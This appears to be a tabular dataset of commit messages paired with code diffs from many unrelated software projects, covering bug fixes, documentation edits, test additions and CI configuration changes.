message
stringlengths 13
484
| diff
stringlengths 38
4.63k
|
---|---|
dark-mode: Make settings page code blocks compatible.
This makes the code blocks compatible by changing the background to be darker and the text color to be base (white). | @@ -332,6 +332,7 @@ body.dark-mode .top-messages-logo svg circle {
body.dark-mode #unmute_muted_topic_notification,
body.dark-mode .message_content code,
body.dark-mode .message_edit_content code,
+body.dark-mode #settings_page code,
body.dark-mode .typeahead.dropdown-menu {
background-color: hsl(212, 25%, 15%);
border-color: hsla(0, 0%, 0%, 0.5);
|
make root comparison case insensitive for windows
find_root_template_from_path tries to find root in passed path with case sensitivity, on Windows it doesn't make sense C:// == c://.
Keep all other paths case sensitive. | @@ -1106,17 +1106,21 @@ class RootItem(FormatObject):
result = False
output = str(path)
- root_paths = list(self.cleaned_data.values())
mod_path = self.clean_path(path)
- for root_path in root_paths:
+ for root_os, root_path in self.cleaned_data.items():
# Skip empty paths
if not root_path:
continue
- if mod_path.startswith(root_path):
+ _mod_path = mod_path # reset to original cleaned value
+ if root_os == "windows":
+ root_path = root_path.lower()
+ _mod_path = _mod_path.lower()
+
+ if _mod_path.startswith(root_path):
result = True
replacement = "{" + self.full_key() + "}"
- output = replacement + mod_path[len(root_path):]
+ output = replacement + _mod_path[len(root_path):]
break
return (result, output)
@@ -1206,6 +1210,7 @@ class Roots:
Raises:
ValueError: When roots are not entered and can't be loaded.
"""
+ print("!roots::{}".format(roots))
if roots is None:
log.debug(
"Looking for matching root in path \"{}\".".format(path)
@@ -1216,10 +1221,12 @@ class Roots:
raise ValueError("Roots are not set. Can't find path.")
if isinstance(roots, RootItem):
+ print("here")
return roots.find_root_template_from_path(path)
for root_name, _root in roots.items():
- success, result = self.find_root_template_from_path(path, _root)
+ print("root::{}".format(_root))
+ success, result = self.find_root_template_from_path(path.lower(), _root)
if success:
log.info("Found match in root \"{}\".".format(root_name))
return success, result
|
make sure we quote extra_kernel_options
argparse will remove quotations, breaking extra_kernel_options and
inspector_extra_kernel_options when more than one option is used, e.g.
--extra-vars extra_kernel_options="console=tty1 console=ttyS0,115200n8" | @@ -50,9 +50,16 @@ def log(*message, only_if=True):
def process_extra_vars(extra_vars):
for item in extra_vars:
+
+ # argparse removes quotes, just add quotes for these vars
+ if 'extra_kernel_options=' in item:
+ key, value = item.split('=', 1)
+ item = key + '="' + value + '"'
+
if item.startswith('@'):
# Make sure relative paths still work
item = '@' + os.path.abspath(item[1:])
+
yield ('-e', item)
|
Add test cases to verify port number 0 for port_forwaring
Floating IP port forwarding internal or external port number should
not allow 0, otherwise you will get some ValueError exception in
neutron server.
Closes-Bug: | @@ -138,6 +138,20 @@ class PortForwardingTestCase(PortForwardingTestCaseBase):
self._remove_router_interface(self.router['id'], subnet_2['id'])
self._remove_router_interface(self.router['id'], subnet_3['id'])
+ def test_create_floatingip_port_forwarding_external_port_0(self):
+ self.port_forwarding[apidef.RESOURCE_NAME][apidef.EXTERNAL_PORT] = 0
+
+ self.assertRaises(ValueError,
+ self.pf_plugin.create_floatingip_port_forwarding,
+ self.context, self.fip['id'], self.port_forwarding)
+
+ def test_create_floatingip_port_forwarding_internal_port_0(self):
+ self.port_forwarding[apidef.RESOURCE_NAME][apidef.INTERNAL_PORT] = 0
+
+ self.assertRaises(ValueError,
+ self.pf_plugin.create_floatingip_port_forwarding,
+ self.context, self.fip['id'], self.port_forwarding)
+
def test_negative_create_floatingip_port_forwarding(self):
self.pf_plugin.create_floatingip_port_forwarding(
self.context, self.fip['id'], self.port_forwarding)
|
Fixed examples/text_style_transfer README
Fixes | @@ -8,7 +8,7 @@ This example implements a simplified variant of the `ctrl-gen` model from
The model roughly has an architecture of `Encoder--Decoder--Classifier`. Compared to the paper, following simplications are made:
* Replaces the base Variational Autoencoder (VAE) model with an attentional Autoencoder (AE) -- VAE is not necessary in the text style transfer setting since we do not need to interpolate the latent space as in the paper.
- * Attribute classifier (i.e., discriminator) is pre-trained, and fixed throughout the full model training.
+ * Attribute classifier (i.e., discriminator) is trained with real data only. Samples generated by the decoder are not used.
* Independency constraint is omitted.
## Usage ##
|
Update lasso.pyx
Lasso Regression:
Remove extra comma to say "coefficients for feature selection and improves" and "cuDF DataFrame and uses coordinate descent" | @@ -28,9 +28,9 @@ class Lasso:
Lasso extends LinearRegression by providing L1 regularization on the
coefficients when predicting response y with a linear combination of the
predictors in X. It can zero some of the coefficients for feature
- selection, and improves the conditioning of the problem.
+ selection and improves the conditioning of the problem.
- cuML's Lasso an array-like object or cuDF DataFrame, and
+ cuML's Lasso an array-like object or cuDF DataFrame and
uses coordinate descent to fit a linear model.
Examples
|
fix(telegram): Telegram does not always return full set of data
Checks for fields added | @@ -18,11 +18,14 @@ class TelegramProvider(Provider):
return data["id"]
def extract_common_fields(self, data):
- return {
- "first_name": data["first_name"],
- "last_name": data["last_name"],
- "username": data["username"],
- }
+ ret = {}
+ if data.get("first_name"):
+ ret["first_name"] = data.get("first_name")
+ if data.get("last_name"):
+ ret["last_name"] = data.get("last_name")
+ if data.get("username"):
+ ret["username"] = data.get("username")
+ return ret
provider_classes = [TelegramProvider]
|
[Cocoa] Implement support for file input control
Display an open file dialog when an <input type="file"> HTML element is
clicked. | @@ -64,6 +64,15 @@ class BrowserView:
alert.setInformativeText_(message)
alert.runModal()
+ # Display an open panel for <input type="file"> element
+ def webView_runOpenPanelForFileButtonWithResultListener_allowMultipleFiles_(self, webview, listener, allow_multiple):
+ files = BrowserView.instance.create_file_dialog(OPEN_DIALOG, '', allow_multiple, '', main_thread=True)
+
+ if files:
+ listener.chooseFilenames_(files)
+ else:
+ listener.cancel()
+
def webView_printFrameView_(self, webview, frameview):
"""
This delegate method is invoked when a script or a user wants to print a webpage (e.g. using the Javascript window.print() method)
@@ -261,7 +270,7 @@ class BrowserView:
PyObjCTools.AppHelper.callAfter(load, content, base_uri)
- def create_file_dialog(self, dialog_type, directory, allow_multiple, save_filename):
+ def create_file_dialog(self, dialog_type, directory, allow_multiple, save_filename, main_thread=False):
def create_dialog(*args):
dialog_type = args[0]
@@ -305,11 +314,15 @@ class BrowserView:
else:
self._file_name = None
+ if not main_thread:
self._file_name_semaphor.release()
+ if main_thread:
+ create_dialog(dialog_type, allow_multiple, save_filename)
+ else:
PyObjCTools.AppHelper.callAfter(create_dialog, dialog_type, allow_multiple, save_filename)
-
self._file_name_semaphor.acquire()
+
return self._file_name
def _add_app_menu(self):
|
Update javascript reverse string
Javascript was slightly misrepresented in the statement "JavaScript only
runs in a web environment..." in jrg94/sample-programs#93 . `node` is
the command line used to run JavaScript without a web environment. I
have updated reverse-string.js to run with node `node
reverse-string.js`. | -function reverse(s) {
- return s.split('').reverse().join('');
-}
-
-function main() {
- var toReverse = prompt("Enter a String", "Hello, World!");
- if (toReverse != null) {
- console.log(reverse(toReverse))
- }
-}
-
-main()
+const readline = require('readline');
+
+const reverse = s => s.split('').reverse().join('');
+
+const rl = readline.createInterface({
+ input: process.stdin,
+ output: process.stdout
+});
+
+const question = 'Enter a String: ';
+
+rl.question(question, (answer) => {
+ console.log(reverse(answer));
+ rl.close();
+});
|
[ENH] Fix Coalesce to use only bfill
* use bfill only for coalesce
* use bfill only for coalesce
* Update coalesce.py
* [pre-commit.ci] auto fixes from pre-commit.com hooks
for more information, see
* Update coalesce.py | @@ -17,14 +17,18 @@ def coalesce(
) -> pd.DataFrame:
"""Coalesce two or more columns of data in order of column names provided.
- Given the list of column names, `coalesce` finds and returns the first
- non-missing value from these columns, for every row in the input dataframe.
- If all the column values are null for a particular row, then the
- `default_value` will be filled in.
+ Given the variable arguments of column names,
+ `coalesce` finds and returns the first non-missing value
+ from these columns, for every row in the input dataframe.
+ If all the column values are null for a particular row,
+ then the `default_value` will be filled in.
+
+ If `target_column_name` is not provided,
+ then the first column is coalesced.
This method does not mutate the original DataFrame.
- Example: Using `coalesce` with 3 columns, "a", "b" and "c".
+ Example: Use `coalesce` with 3 columns, "a", "b" and "c".
>>> import pandas as pd
>>> import numpy as np
@@ -34,13 +38,21 @@ def coalesce(
... "b": [2, 3, np.nan],
... "c": [4, np.nan, np.nan],
... })
+ >>> df.coalesce("a", "b", "c")
+ a b c
+ 0 2.0 2.0 4.0
+ 1 1.0 3.0 NaN
+ 2 NaN NaN NaN
+
+ Example: Provide a target_column_name.
+
>>> df.coalesce("a", "b", "c", target_column_name="new_col")
a b c new_col
0 NaN 2.0 4.0 2.0
1 1.0 3.0 NaN 1.0
2 NaN NaN NaN NaN
- Example: Providing a default value.
+ Example: Provide a default value.
>>> import pandas as pd
>>> import numpy as np
@@ -93,13 +105,8 @@ def coalesce(
if target_column_name is None:
target_column_name = column_names[0]
- # bfill/ffill combo is faster than combine_first
- outcome = (
- df.filter(column_names)
- .bfill(axis="columns")
- .ffill(axis="columns")
- .iloc[:, 0]
- )
+
+ outcome = df.filter(column_names).bfill(axis="columns").iloc[:, 0]
if outcome.hasnans and (default_value is not None):
outcome = outcome.fillna(default_value)
|
[IMPR] do not compare against None but use explicit "is None"
do not compare against None but use explicit "is None"
also use an explicit return at end of the function
if function have already a return value other than None | @@ -76,20 +76,17 @@ class HttpRequest:
@property
def exception(self):
"""Get the exception, if any."""
- if isinstance(self.data, Exception):
- return self.data
+ return self.data if isinstance(self.data, Exception) else None
@property
def response_headers(self):
"""Return the response headers."""
- if not self.exception:
- return self.data.headers
+ return self.data.headers if not self.exception else None
@property
def raw(self):
"""Return the raw response body."""
- if not self.exception:
- return self.data.content
+ return self.data.content if not self.exception else None
@property
def parsed_uri(self):
@@ -109,8 +106,7 @@ class HttpRequest:
@rtype: int
"""
- if not self.exception:
- return self.data.status_code
+ return self.data.status_code if not self.exception else None
@property
def header_encoding(self):
@@ -146,15 +142,15 @@ class HttpRequest:
charset = 'latin1'
else:
charset = self.charset
+ lookup = codecs.lookup(charset) if charset else None
if (self.header_encoding
- and codecs.lookup(
- self.header_encoding) != (
- codecs.lookup(charset) if charset else None)):
+ and (lookup is None
+ or codecs.lookup(self.header_encoding) != lookup)):
if charset:
pywikibot.warning(
- 'Encoding "{0}" requested but "{1}" '
- 'received in the header.'.format(
- charset, self.header_encoding))
+ 'Encoding "{}" requested but "{}" '
+ 'received in the header.'
+ .format(charset, self.header_encoding))
try:
# TODO: Buffer decoded content, weakref does remove it too
# early (directly after this method)
|
replace maxradius by extdiam
This patch replaces the maxradius parameter by extdiam, for external diameter,
which is a better fit to the cylinder diameter that is used as the reference
length in the computation. | @@ -69,7 +69,7 @@ class PostProcessor:
self.regularize_xgrd()
-def main(nelems: int, degree: int, reynolds: float, rotation: float, timestep: float, maxradius: float, endtime: float):
+def main(nelems: int, degree: int, reynolds: float, rotation: float, timestep: float, extdiam: float, endtime: float):
'''
Flow around a cylinder.
@@ -89,15 +89,15 @@ def main(nelems: int, degree: int, reynolds: float, rotation: float, timestep: f
Cylinder rotation speed.
timestep [.04]
Time step
- maxradius [25]
- Target exterior radius; the actual domain size is subject to integer
+ extdiam [50]
+ Target exterior diameter; the actual domain size is subject to integer
multiples of the configured element size.
endtime [inf]
Stopping time.
'''
elemangle = 2 * numpy.pi / nelems
- melems = int(numpy.log(2*maxradius) / elemangle + .5)
+ melems = round(numpy.log(extdiam) / elemangle)
treelog.info('creating {}x{} mesh, outer radius {:.2f}'.format(melems, nelems, .5*numpy.exp(elemangle*melems)))
domain, geom = mesh.rectilinear([melems, nelems], periodic=(1,))
domain = domain.withboundary(inner='left', inflow=domain.boundary['right'][nelems//2:])
@@ -164,7 +164,7 @@ if __name__ == '__main__':
class test(testing.TestCase):
def test_rot0(self):
- args = main(nelems=6, degree=3, reynolds=100, rotation=0, timestep=.1, maxradius=25, endtime=.1)
+ args = main(nelems=6, degree=3, reynolds=100, rotation=0, timestep=.1, extdiam=50, endtime=.1)
with self.subTest('velocity'):
self.assertAlmostEqual64(args['u'], '''
eNoBkABv//AzussRy7rL8DNVNU42sskxyLLJTjbPN7Q4SscGxkrHtDj9ObM6SMXmw0jFszofPFU8nsNk
@@ -176,7 +176,7 @@ class test(testing.TestCase):
Ogw4NMhAxu42Ij1DxCI97jZ+wirgIsM=''')
def test_rot1(self):
- args = main(nelems=6, degree=3, reynolds=100, rotation=1, timestep=.1, maxradius=25, endtime=.1)
+ args = main(nelems=6, degree=3, reynolds=100, rotation=1, timestep=.1, extdiam=50, endtime=.1)
with self.subTest('velocity'):
self.assertAlmostEqual64(args['u'], '''
eNoBkABv//czw8sRy7HL6TNVNU82tckxyLDJTTbPN7Q4SscGxkrHszj9ObM6SMXmw0jFszofPFU8nsNk
|
fix version logic
Added documentation. | @@ -91,15 +91,19 @@ class CollectPublishedFiles(pyblish.api.ContextPlugin):
host_name="webpublisher",
project_settings=context.data["project_settings"]
)
- next_versions.append(self._get_next_version(
+ version = self._get_next_version(
project_name, asset_doc, subset_name
- ))
+ )
+ next_versions.append(version)
instance = context.create_instance(subset_name)
instance.data["asset"] = asset_name
instance.data["subset"] = subset_name
+ # set configurable result family
instance.data["family"] = family
+ # set configurable additional families
instance.data["families"] = families
+ instance.data["version"] = version
instance.data["stagingDir"] = tempfile.mkdtemp()
instance.data["source"] = "webpublisher"
@@ -146,6 +150,7 @@ class CollectPublishedFiles(pyblish.api.ContextPlugin):
if not self.sync_version:
return
+ # overwrite specific version with same version for all
max_next_version = max(next_versions)
for inst in instances:
inst.data["version"] = max_next_version
@@ -187,7 +192,7 @@ class CollectPublishedFiles(pyblish.api.ContextPlugin):
"ext": ext[1:],
"files": files,
"stagingDir": task_dir,
- "tags": tags
+ "tags": tags # configurable tags from Settings
}
self.log.info("sequences repre_data.data:: {}".format(repre_data))
return [repre_data]
|
Update super-admin-remove-facility.feature
Added 'Examples' | @@ -7,7 +7,7 @@ Feature: Remove facility
Scenario: Successfuly remove facility
Given there are at least two facilities on my device
- Given my super admin account is not a member of the <facility>
+ And my super admin account is not a member of the <facility>
When I click *Options* for <facility>
When I click *Remove facility*
Then I see the modal to *Remove facility from this device*
@@ -62,5 +62,5 @@ Feature: Remove facility
Examples:
-| ??? | ??? |
-| ?????!?! |
+| facility |
+| MySchool |
|
Improve performance of matrix_equal function
Improve performance of matrix_equal function by approx 4x by preventing copying array inports and preventing unnecessarily iterating over the full array to find the first non-zero entry. | @@ -52,19 +52,26 @@ def matrix_equal(mat1,
atol = ATOL_DEFAULT
if rtol is None:
rtol = RTOL_DEFAULT
+
+ if not isinstance(mat1, np.ndarray):
mat1 = np.array(mat1)
+ if not isinstance(mat2, np.ndarray):
mat2 = np.array(mat2)
+
if mat1.shape != mat2.shape:
return False
+
if ignore_phase:
# Get phase of first non-zero entry of mat1 and mat2
# and multiply all entries by the conjugate
- phases1 = np.angle(mat1[abs(mat1) > atol].ravel(order='F'))
- if len(phases1) > 0:
- mat1 = np.exp(-1j * phases1[0]) * mat1
- phases2 = np.angle(mat2[abs(mat2) > atol].ravel(order='F'))
- if len(phases2) > 0:
- mat2 = np.exp(-1j * phases2[0]) * mat2
+ for elt in mat1.flat:
+ if abs(elt) > atol:
+ mat1 = np.exp(-1j * np.angle(elt)) * mat1
+ break
+ for elt in mat2.flat:
+ if abs(elt) > atol:
+ mat2 = np.exp(-1j * np.angle(elt)) * mat2
+ break
return np.allclose(mat1, mat2, rtol=rtol, atol=atol)
|
Harden 'test_access_to_public_bucket' systest against 429 / 503 errors.
Closes | @@ -1335,9 +1335,9 @@ class TestAnonymousClient(unittest.TestCase):
def test_access_to_public_bucket(self):
anonymous = storage.Client.create_anonymous_client()
bucket = anonymous.bucket(self.PUBLIC_BUCKET)
- blob, = bucket.list_blobs(max_results=1)
+ blob, = retry_429_503(bucket.list_blobs)(max_results=1)
with tempfile.TemporaryFile() as stream:
- blob.download_to_file(stream)
+ retry_429_503(blob.download_to_file)(stream)
class TestKMSIntegration(TestStorageFiles):
|
feat: Add Wei.to() method for unit conversion
Accepts a unit as string and will return a Fixed number converted to the desired unit type | @@ -74,6 +74,12 @@ class Wei(int):
def __sub__(self, other: Any) -> "Wei":
return Wei(super().__sub__(_to_wei(other)))
+ def to(self, unit: str) -> Decimal:
+ try:
+ return _to_fixed(self) * Decimal(10) ** (-Decimal(UNITS[unit]))
+ except KeyError:
+ raise TypeError(f'Cannot convert wei to unknown unit: "{unit}". ')
+
def _to_wei(value: WeiInputTypes) -> int:
original = value
|
fw/descriptor: Add parameter list for Telenet connections.
`TelnetConnection` no longer uses the same parameter list as
`SSHConnection` so create it's own parameter list. | @@ -20,7 +20,7 @@ from copy import copy
from devlib import (LinuxTarget, AndroidTarget, LocalLinuxTarget,
ChromeOsTarget, Platform, Juno, TC2, Gem5SimulationPlatform,
AdbConnection, SshConnection, LocalConnection,
- Gem5Connection)
+ TelnetConnection, Gem5Connection)
from devlib.target import DEFAULT_SHELL_PROMPT
from wa.framework import pluginloader
@@ -364,6 +364,46 @@ CONNECTION_PARAMS = {
""",
deprecated=True),
],
+ TelnetConnection: [
+ Parameter(
+ 'host', kind=str, mandatory=True,
+ description="""
+ Host name or IP address of the target.
+ """),
+ Parameter(
+ 'username', kind=str, mandatory=True,
+ description="""
+ User name to connect with
+ """),
+ Parameter(
+ 'password', kind=str,
+ description="""
+ Password to use.
+ """),
+ Parameter(
+ 'port', kind=int,
+ description="""
+ The port SSH server is listening on on the target.
+ """),
+ Parameter(
+ 'password_prompt', kind=str,
+ description="""
+ Password prompt to expect
+ """),
+ Parameter(
+ 'original_prompt', kind=str,
+ description="""
+ Original shell prompt to expect.
+ """),
+ Parameter(
+ 'sudo_cmd', kind=str,
+ default="sudo -- sh -c {}",
+ description="""
+ Sudo command to use. Must have ``{}`` specified
+ somewhere in the string it indicate where the command
+ to be run via sudo is to go.
+ """),
+ ],
Gem5Connection: [
Parameter(
'host', kind=str, mandatory=False,
|
Give the actual .netrc path
It's not `/root/.netrc` as the `~` implied. | @@ -938,7 +938,7 @@ URL using the format ``https://<user>:<password>@<url>``, like so:
gitfs_remotes:
- https://git:[email protected]/myrepo.git
-The other way would be to configure the authentication in ``~/.netrc``:
+The other way would be to configure the authentication in ``/var/lib/salt/.netrc``:
.. code-block:: text
|
fix(listview): Smart parsing of route options
Fieldname should also be searched in child tables | @@ -50,18 +50,7 @@ frappe.views.ListView = class ListView extends frappe.views.BaseList {
if (frappe.route_options) {
// Priority 1: route filters
- let filters = [];
- for (let key in frappe.route_options) {
- let value = frappe.route_options[key];
- if (value.startsWith('[') && value.endsWith(']')) {
- value = JSON.parse(value);
- } else {
- value = ['=', value];
- }
- filters.push([this.doctype, key, ...value])
- }
- this.filters = filters;
- frappe.route_options = null;
+ this.filters = this.parse_filters_from_route_options();
} else if (this.view_user_settings.filters) {
// Priority 2: saved filters
const saved_filters = this.view_user_settings.filters;
@@ -1126,11 +1115,17 @@ frappe.views.ListView = class ListView extends frappe.views.BaseList {
return actions_menu_items;
}
- set_filters_from_route_options() {
+ parse_filters_from_route_options() {
const filters = [];
+
for (let field in frappe.route_options) {
- var value = frappe.route_options[field];
- var doctype = null;
+
+ let doctype = null;
+ let value = frappe.route_options[field];
+
+ if (value.startsWith('[') && value.endsWith(']')) {
+ value = JSON.parse(value);
+ }
// if `Child DocType.fieldname`
if (field.includes('.')) {
@@ -1157,10 +1152,7 @@ frappe.views.ListView = class ListView extends frappe.views.BaseList {
}
frappe.route_options = null;
- this.filter_area.clear(false)
- .then(() => {
- this.filter_area.add(filters);
- });
+ return filters;
}
static trigger_list_update(data) {
|
doc: Fix command output in scheduler document
Closes-Bug: | @@ -1119,7 +1119,7 @@ the aggregate. Then, you add the ``node1``, and ``node2`` compute nodes to it.
| created_at | 2016-12-22T07:31:13.000000 |
| deleted | False |
| deleted_at | None |
- | hosts | [u'node2'] |
+ | hosts | [u'node1', u'node2'] |
| id | 1 |
| metadata | {u'ssd': u'true', u'availability_zone': u'nova'} |
| name | fast-io |
|
utils: Fix PreAuth signer in signer_key_xdr_object.
The comparison was never triggered and the PreAuth signer was not added to XDR.
Issue: | @@ -54,7 +54,7 @@ def signer_key_xdr_object(signer_type, signer):
return Xdr.types.SignerKey(Xdr.const.SIGNER_KEY_TYPE_ED25519, decode_check('account', signer))
if signer_type == 'hashX':
return Xdr.types.SignerKey(Xdr.const.SIGNER_KEY_TYPE_HASH_X, hashX=signer)
- if signer_type == 'preAuthTX':
+ if signer_type == 'preAuthTx':
return Xdr.types.SignerKey(Xdr.const.SIGNER_KEY_TYPE_PRE_AUTH_TX, preAuthTx=signer)
|
Fixes Circuit.convert_to_openqasm() and .convert_to_quil().
These where broken (w/NotImplementedError added) since the great
renaming. It turns out getting them working again just required
adding ".components" in a couple places to iteration over a circuit
layer now works properly. | @@ -1938,7 +1938,7 @@ class Circuit(object):
str
A quil string.
"""
- raise NotImplementedError("TODO: need to upgrade this method")
+
# create standard conversations.
if gatename_conversion is None:
gatename_conversion = _itgs.get_standard_gatenames_quil_conversions()
@@ -1973,7 +1973,7 @@ class Circuit(object):
qubits_used = []
# Go through the (non-self.identity) gates in the layer and convert them to quil
- for gate in layer:
+ for gate in layer.components:
gate_qubits = gate.qubits if (gate.qubits is not None) else self.line_labels
assert(len(gate_qubits) <= 2 or gate.qubits is None), 'LinearOperator on more than 2 qubits given; this is currently not supported!'
@@ -2053,7 +2053,7 @@ class Circuit(object):
str
An openqasm string.
"""
- raise NotImplementedError("TODO: need to upgrade this method")
+
# create standard conversations.
if gatename_conversion is None:
gatename_conversion = _itgs.get_standard_gatenames_openqasm_conversions()
@@ -2091,7 +2091,7 @@ class Circuit(object):
qubits_used = []
# Go through the (non-self.identity) gates in the layer and convert them to openqasm
- for gate in layer:
+ for gate in layer.components:
gate_qubits = gate.qubits if (gate.qubits is not None) else self.line_labels
assert(len(gate_qubits) <= 2), 'Gates on more than 2 qubits given; this is currently not supported!'
|
search: Add defaultSortingOnEmptyQueryString in search config
Change the default sorting to newest in case the query string is left empty | }
},
"sortOrderDisabled": true,
+ "defaultSortingOnEmptyQueryString": {
+ "sortBy": "newest"
+ },
"sortOptions": [
{
"sortBy": "bestmatch",
|
Changed reduce sum to a simple addition
This should speed up computation time | @@ -135,7 +135,7 @@ class TensorflowRewardManager(reward_manager.RewardManager):
lambda: self.zero_reward)
new_r = newest_reward + tf.multiply(self.discount_factor, previous_reward)
index = tf.reshape(counter, [1])
- reward = tf.reshape(tf.reduce_sum(new_r), [1])
+ reward = new_r[0] + new_r[1]
update_tensor = tf.scatter_nd(index, reward, tf.shape(discounted_rewards))
new_discounted_rewards = discounted_rewards + update_tensor
new_counter = counter - tf.constant(1)
|
Added info about RethinkDB storage
(not sure if it has to be done manually) | @@ -16,3 +16,10 @@ Redis storage
.. automodule:: aiogram.contrib.fsm_storage.redis
:members:
:show-inheritance:
+
+RethinkDB storage
+-----------------
+
+.. automodule:: aiogram.contrib.fsm_storage.rethinkdb
+ :members:
+ :show-inheritance:
|
Allowed grid mode to fall back to hanging grid
When there are very long package or module names, the grid mode sometimes outputs lines longer than line_length. We now fall back to mode 4 if it's more compact or if mode 0 violates the line_length. | @@ -503,6 +503,16 @@ class SortImports(object):
if do_multiline_reformat:
import_statement = self._multi_line_reformat(import_start, from_import_section, comments)
+ if self.config['multi_line_output'] == 0:
+ self.config['multi_line_output'] = 4
+ try:
+ other_import_statement = self._multi_line_reformat(import_start, from_import_section, comments)
+ if (other_import_statement.count('\n') < import_statement.count('\n')
+ or max(len(x)
+ for x in import_statement.split('\n')) > self.config['line_length']):
+ import_statement = other_import_statement
+ finally:
+ self.config['multi_line_output'] = 0
if not do_multiline_reformat and len(import_statement) > self.config['line_length']:
import_statement = self._wrap(import_statement)
|
Added `-it` param to `docker run` installation with Docker
Document use of interactive shell in docker | @@ -40,7 +40,7 @@ Check out the [Getting Started](https://www.youtube.com/watch?v=7wyIi_cpodE&list
docker pull opsdroid/opsdroid:latest
# Run the container
-docker run --rm -v /path/to/configuration.yaml:/etc/opsdroid/configuration.yaml:ro opsdroid/opsdroid:latest
+docker run --rm -it -v /path/to/configuration.yaml:/etc/opsdroid/configuration.yaml:ro opsdroid/opsdroid:latest
```
### Ubuntu 16.04 LTS
|
[varLib] Start generating STAT table
Right now just reflects the axes, and even that with certain limitations:
AxisOrdering is set to the order axes are defined,
Name-table entries are not shared with fvar.
Towards | @@ -167,6 +167,31 @@ def _add_avar(font, axes):
return avar
+def _add_stat(font, axes):
+
+ nameTable = font['name']
+
+ assert "STAT" not in font
+ STAT = font["STAT"] = newTable('STAT')
+ stat = STAT.table = ot.STAT()
+ stat.Version = 0x00010000
+
+ axisRecords = []
+ for i,a in enumerate(axes.values()):
+ axis = ot.AxisRecord()
+ axis.AxisTag = Tag(a.tag)
+ # Meh. Reuse fvar nameID!
+ axis.AxisNameID = nameTable.addName(tounicode(a.labelname['en']))
+ axis.AxisOrdering = i
+ axisRecords.append(axis)
+
+ axisRecordArray = ot.AxisRecordArray()
+ axisRecordArray.Axis = axisRecords
+ # XXX these should not be hard-coded but computed automatically
+ stat.DesignAxisRecordSize = 8
+ stat.DesignAxisCount = len(axisRecords)
+ stat.DesignAxisRecord = axisRecordArray
+
# TODO Move to glyf or gvar table proper
def _GetCoordinates(font, glyphName):
"""font, glyphName --> glyph coordinates as expected by "gvar" table
@@ -675,6 +700,7 @@ def build(designspace_filename, master_finder=lambda s:s):
# TODO append masters as named-instances as well; needs .designspace change.
fvar = _add_fvar(vf, axes, instances)
+ _add_stat(vf, axes)
_add_avar(vf, axes)
del instances
|
Fix macOS Python 2.7 build
Currently Python 2.7 tests & builds were run twice for Linux instead.
Swap configuration to macOS 10.15, in par with Python 3 workflow,
and to make Process.environ tests pass (broken in macOS 11+). | @@ -81,16 +81,16 @@ jobs:
# Linux + macOS + Python 2
linux-macos-py2:
name: ${{ matrix.os }}-py2
- runs-on: ubuntu-latest
+ runs-on: ${{ matrix.os }}
timeout-minutes: 20
strategy:
fail-fast: false
matrix:
- os: [ubuntu-latest, macos-latest]
+ os: [ubuntu-latest, macos-10.15]
include:
- {name: Linux, python: '3.9', os: ubuntu-latest}
env:
- CIBW_ARCHS: 'x86_64 i686'
+ CIBW_ARCHS_LINUX: 'x86_64 i686'
CIBW_TEST_COMMAND:
PYTHONWARNINGS=always PYTHONUNBUFFERED=1 PSUTIL_DEBUG=1 python {project}/psutil/tests/runner.py &&
PYTHONWARNINGS=always PYTHONUNBUFFERED=1 PSUTIL_DEBUG=1 python {project}/psutil/tests/test_memleaks.py
|
Decode & in project -> "View Registration Form"
[#OSF-8522]
Registration Form data is HTML encoded before storing in postgres.
This PR HTML decodes & in data before presentation. | @@ -210,6 +210,9 @@ var Question = function(questionSchema, data) {
value = self.data.value();
} else {
value = self.data.value || null;
+ if(value) {
+ value = $osf.decodeText(value);
+ }
}
if (self.type === 'choose' && self.format === 'multiselect') {
|
Use explicit `OpenPrescribing-Bot` user-agent
The default `requests` user-agent appears to be blocked (using it
results in a 403 response) but this seems to work fine and is even
more polite of us so I can't see how it could be objected to. | @@ -17,6 +17,10 @@ from openprescribing.slack import notify_slack
logger = logging.getLogger(__file__)
+DEFAULT_HEADERS = {
+ "User-Agent": "OpenPrescribing-Bot (+https://openprescribing.net)",
+}
+
class Command(BaseCommand):
def handle(self, *args, **kwargs):
@@ -52,7 +56,7 @@ class Command(BaseCommand):
def download_archive(self):
url = "https://psnc.org.uk/funding-and-reimbursement/reimbursement/price-concessions/archive/"
- rsp = requests.get(url)
+ rsp = requests.get(url, headers=DEFAULT_HEADERS)
return bs4.BeautifulSoup(rsp.content, "html.parser")
def import_from_current(self):
@@ -74,7 +78,7 @@ class Command(BaseCommand):
def download_current(self):
url = "https://psnc.org.uk/funding-and-reimbursement/reimbursement/price-concessions/"
- rsp = requests.get(url)
+ rsp = requests.get(url, headers=DEFAULT_HEADERS)
return bs4.BeautifulSoup(rsp.content, "html.parser")
def date_from_heading(self, heading):
|
Make an assert on a hotpath trigger only in DEBUG mode.
Summary:
Pull Request resolved:
Test Plan: Imported from OSS | @@ -62,7 +62,7 @@ inline Return KernelFunction::callUnboxed(const OperatorHandle& opHandle, Args..
return (*func)(getFunctor_(), std::forward<Args>(args)...);
}
- TORCH_INTERNAL_ASSERT(boxed_kernel_func_ != nullptr, "Tried to call KernelFunction::callUnboxed() on an uninitialized KernelFunction.");
+ TORCH_INTERNAL_ASSERT_DEBUG_ONLY(boxed_kernel_func_ != nullptr, "Tried to call KernelFunction::callUnboxed() on an uninitialized KernelFunction.");
return impl::boxAndCallBoxedFunc<Return, Args...>(boxed_kernel_func_, getFunctor_(), opHandle, std::forward<Args>(args)...);
}
|
Fix invalid MD enumeration
Just that, the enumeration was invalidly formatted, with line break. No content change. | @@ -23,8 +23,7 @@ The easy way
1. Create a subclass from the dataset class of your choice
2. Define custom functions containing your business logic
-3. Use the `column_map_expectation` and `column_aggregate_expectation` decorators to turn them into full Expectations. Note that each dataset class implements its own versions of `@column_map_expectation` and `@column_aggregate_expectation`, so you should consult the documentation of each class to ensure you
-are returning the correct information to the decorator.
+3. Use the `column_map_expectation` and `column_aggregate_expectation` decorators to turn them into full Expectations. Note that each dataset class implements its own versions of `@column_map_expectation` and `@column_aggregate_expectation`, so you should consult the documentation of each class to ensure you are returning the correct information to the decorator.
Note: following Great Expectations :ref:`naming_conventions` is highly recommended, but not strictly required. If you want to confuse yourself with bad names, the package won't stop you.
|
GREP for PR reference accepts references that are split over a line
Fixes | @@ -16,6 +16,6 @@ jobs:
- name: Grep CHANGES.md for PR number
if: contains(github.event.pull_request.labels.*.name, 'skip news') != true
run: |
- grep -P "PR #${{ github.event.pull_request.number }}[^0-9]" CHANGES.md || \
+ grep -Pz "PR( |\n\s*)#${{ github.event.pull_request.number }}[^0-9]" CHANGES.md || \
(echo "Please add 'PR #${{ github.event.pull_request.number }}' change line to CHANGES.md" && \
exit 1)
|
Remove hyphenation when templating new repo
